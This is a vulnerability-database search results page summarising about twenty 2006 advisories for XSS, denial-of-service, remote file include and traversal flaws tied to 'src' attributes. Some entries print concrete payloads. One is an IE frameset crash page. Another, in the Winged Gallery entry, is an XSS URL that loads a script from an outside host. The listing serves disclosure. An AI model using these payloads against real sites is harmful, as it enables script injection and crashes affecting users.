Lucene search

1233 matches found

seebug.org
added 2006/12/08 12:0 a.m., 26 views

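Microsoft Internet Explorer Frame Src Denial of Service Vulnerability

Microsoft Internet Explorer is a popular web browser. Microsoft Internet Explorer has a flaw in how it handles Frame src, which a remote attacker can exploit to cause a denial of service in the application. Submitting a page similar to the following and enticing a user to open it can crash the application: html frameset rows="1000%" frame src="?" /html Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2...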

7 AI score
Exploits 0

ATTACKERKB
added 2006/12/06 8:28 p.m., 3 views

CVE-2006-6310

Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (crash) via an invalid src attribute value "?" in an HTML frame tag that is in a frameset tag with a large rows attribute. NOTE: The provenance of this information is unknown; the details are obtain...

5 CVSS, 5.6 AI score, 0.14506 EPSS
Exploits 1, References 4

seebug.org
added 2006/12/06 12:0 a.m., 11 views

Spaminator <= 1.7 (page) Remote File Include Vulnerability

No description provided by source. Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...

7.1 AI score
Exploits 0

ATTACKERKB
added 2006/12/04 11:28 a.m., 2 views

CVE-2006-6277

Directory traversal vulnerability in admin/FileServer.php in ContentServ 4.x allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter, a different vector than CVE-2005-3086...

6.4 CVSS, 5.8 AI score, 0.03305 EPSS
Exploits 2, References 7

Positive Technologies
added 2006/09/27 12:0 a.m., 3 views

PT-2006-5778 · Matrix · Matrix

Name of the Vulnerable Software and Affected Versions: Matrix versions after 3.8 Description: The issue allows remote attackers to use the application as an HTTP proxy server via a MIME encoded URL in the sq content src parameter. This can be used to access arbitrary sites with the server's IP...

6.8 CVSS, 6.1 AI score, 0.01204 EPSS
Exploits 0, References 6

Cvelist
added 2006/08/30 1:0 a.m., 15 views

CVE-2003-1305

Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page...

6.5 AI score, 0.01243 EPSS
Exploits 1, References 2

UbuntuCve
added 2006/07/18 3:47 p.m., 14 views

CVE-2006-3665

SquirrelMail 1.4.6 and earlier, with register_globals enabled, allows remote attackers to hijack cookies in src/redirect.php via unknown vectors. NOTE: while "cookie theft" is frequently associated with XSS, the vendor disclosure is too vague to be certain of this...

4.3 CVSS, 5.8 AI score, 0.01177 EPSS
Exploits 0, References 1

Cvelist
added 2006/07/13 12:0 a.m., 14 views

CVE-2006-3538

Multiple cross-site scripting (XSS) vulnerabilities in demo.php in BeatificFaith Eprayer Alpha allow remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the (1) "Your name" field and (2) "Enter Prayer Request here" field...

5.8 AI score, 0.01903 EPSS
Exploits 1, References 5

securityvulns
added 2006/06/27 12:0 a.m., 37 views

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...

0.1 AI score
Exploits 0

NVD
added 2006/06/13 1:2 a.m., 23 views

CVE-2006-2991

Multiple cross-site scripting (XSS) vulnerabilities in Ringlink 3.2 allow remote attackers to inject arbitrary web script or HTML via a JavaScript URI in the SRC attribute of an IMG element, and possibly other manipulations, in the ringid parameter in (1) next.cgi, (2) stats.cgi, or (3) list.cgi...

4.3 CVSS, 5.8 AI score, 0.01644 EPSS
Exploits 0, References 9

CVE
added 2006/06/13 1:0 a.m., 43 views

CVE-2006-2991

CVE-2006-2991 describes multiple XSS vulnerabilities in Ringlink 3.2. The issue arises via a JavaScript URI in the SRC attribute of an IMG element (ringid parameter) in next.cgi, stats.cgi, or list.cgi. Affected component: Ringlink 3.2; vulnerability class: cross-site scripting; impact per NVD me...

4.3 CVSS, 6 AI score, 0.01644 EPSS
Exploits 0, References 9, Affected Software 1

NVD
added 2006/06/12 10:2 p.m., 7 views

CVE-2006-2975

Multiple cross-site scripting (XSS) vulnerabilities in pblguestbook.php in PBL Guestbook 1.31 allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of IMG tags in the (1) name, (2) email, and (3) website parameter, which bypasses XSS protection mechanisms that...

2.6 CVSS, 5.3 AI score, 0.0139 EPSS
Exploits 0, References 5

NVD
added 2006/06/12 8:6 p.m., 19 views

CVE-2006-2969

Cross-site scripting (XSS) vulnerability in L0j1k tinyMuw 0.1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the input box in quickchat.php, and possibly other manipulations...

4.3 CVSS, 5.8 AI score, 0.01275 EPSS
Exploits 0, References 6

Prion
added 2006/06/05 5:2 p.m., 13 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in Lycos Tripod htmlGEAR guestGEAR (aka Guest Gear) allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

6.8 CVSS, 6.1 AI score, 0.01199 EPSS
Exploits 0, References 2

Cvelist
added 2006/06/05 5:0 p.m., 13 views

CVE-2006-2808

Cross-site scripting (XSS) vulnerability in Lycos Tripod htmlGEAR guestGEAR (aka Guest Gear) allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

5.7 AI score, 0.01199 EPSS
Exploits 0, References 2

NVD
added 2006/06/02 7:2 p.m., 22 views

CVE-2006-2785

Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 1.5.0.4 allows user-assisted remote attackers to inject arbitrary web script or HTML by tricking a user into (1) performing a "View Image" on a broken image in which the SRC attribute contains a Javascript URL, or (2) selecting "Show on...

4.3 CVSS, 5.2 AI score, 0.01519 EPSS
Exploits 0, References 39

Prion
added 2006/05/30 10:2 a.m., 19 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in view.php in TuttoPhp (1) Morris Guestbook 1, (2) Pretty Guestbook 1, and (3) Smile Guestbook 1 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the pagina parameter...

4.3 CVSS, 6.1 AI score, 0.01922 EPSS
Exploits 0, References 14

Positive Technologies
added 2006/05/12 12:0 a.m., 4 views

PT-2006-3297 · Mozilla · Firefox

Name of the Vulnerable Software and Affected Versions: Mozilla Firefox version 1.5.0.3 Description: The issue allows remote attackers to cause a denial of service via a web page with a large number of IMG elements in which the SRC attribute is a mailto URI. It was noted that the web page caused a...

2.6 CVSS, 6.3 AI score, 0.01179 EPSS
Exploits 0, References 6

Prion
added 2006/04/21 10:2 p.m., 13 views

Design/Logic Flaw

Apple Safari 2.0.3 allows remote attackers to cause a denial of service and possibly execute code via an invalid FRAME tag, possibly due to (1) multiple SCROLLING attributes with no values, or (2) a SRC attribute with no value. NOTE: due to lack of diagnosis by the researcher, it is unclear which...

7.5 CVSS, 7.5 AI score, 0.03563 EPSS
Exploits 1, References 6, Affected Software 1

RedHat Linux
added 2006/04/21 3:41 p.m., 2 views

security flaw

The WYSIWYG rendering engine ("rich mail" editor) in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

9.3 CVSS, 5.8 AI score, 0.07066 EPSS
Exploits 1, References 4